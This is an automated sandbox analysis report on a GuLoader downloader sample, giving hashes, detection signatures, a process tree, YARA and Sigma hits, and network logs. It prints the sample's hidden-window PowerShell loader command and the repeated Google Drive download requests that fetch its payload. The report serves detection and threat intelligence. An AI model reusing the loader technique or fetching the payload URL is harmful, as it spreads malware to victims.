Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
av8XPPpdBc.exe

Overview

General Information

Sample name:av8XPPpdBc.exe
renamed because original name is a hash value
Original sample name:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1.exe
Analysis ID:1588780
MD5:21f092b643089f4c05d3257430075a65
SHA1:e54525e972627916bac452001cd2f5a5e75c650d
SHA256:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • av8XPPpdBc.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\av8XPPpdBc.exe" MD5: 21F092B643089F4C05D3257430075A65)
    • powershell.exe (PID: 5072 cmdline: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Autocueing.exe (PID: 5140 cmdline: "C:\Users\user\AppData\Local\Temp\Autocueing.exe" MD5: 21F092B643089F4C05D3257430075A65)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", CommandLine: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\av8XPPpdBc.exe", ParentImage: C:\Users\user\Desktop\av8XPPpdBc.exe, ParentProcessId: 6720, ParentProcessName: av8XPPpdBc.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", ProcessId: 5072, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T05:28:00.626428+010028032702Potentially Bad Traffic192.168.2.649942142.250.185.142443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeReversingLabs: Detection: 62%
      Multi AV Scanner detection for submitted file
      Source: av8XPPpdBc.exeVirustotal: Detection: 48%Perma Link
      Source: av8XPPpdBc.exeReversingLabs: Detection: 62%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: av8XPPpdBc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50005 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50021 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: av8XPPpdBc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: e.pdbd< source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49942 -> 142.250.185.142:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
